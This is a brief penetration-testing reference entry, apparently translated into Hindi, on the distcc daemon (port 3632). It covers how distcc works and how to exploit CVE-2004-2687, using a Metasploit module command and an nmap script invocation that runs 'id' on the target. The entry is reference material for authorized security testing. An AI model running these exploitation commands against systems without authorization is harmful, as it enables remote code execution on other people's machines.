3632 - Pentesting distcc

Basic Information

Distcc एक उपकरण है जो संकलन प्रक्रिया को बढ़ाता है, जो नेटवर्क में अन्य कंप्यूटरों की खाली प्रोसेसिंग शक्ति का उपयोग करता है। जब distcc एक मशीन पर सेट किया जाता है, तो यह मशीन अपनी संकलन कार्यों को दूसरे सिस्टम में वितरित करने में सक्षम होती है। इस प्राप्तकर्ता सिस्टम पर distccd डेमन चल रहा होना चाहिए और भेजे गए कोड को संसाधित करने के लिए एक अनुकूलित संकलक स्थापित होना चाहिए।

डिफ़ॉल्ट पोर्ट: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Exploitation

जांचें कि क्या यह CVE-2004-2687 के प्रति संवेदनशील है ताकि मनमाने कोड को निष्पादित किया जा सके:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

मुझे नहीं लगता कि shodan इस सेवा का पता लगाता है।

Resources

• https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec

• https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855

Post created by Álex B (@r1p)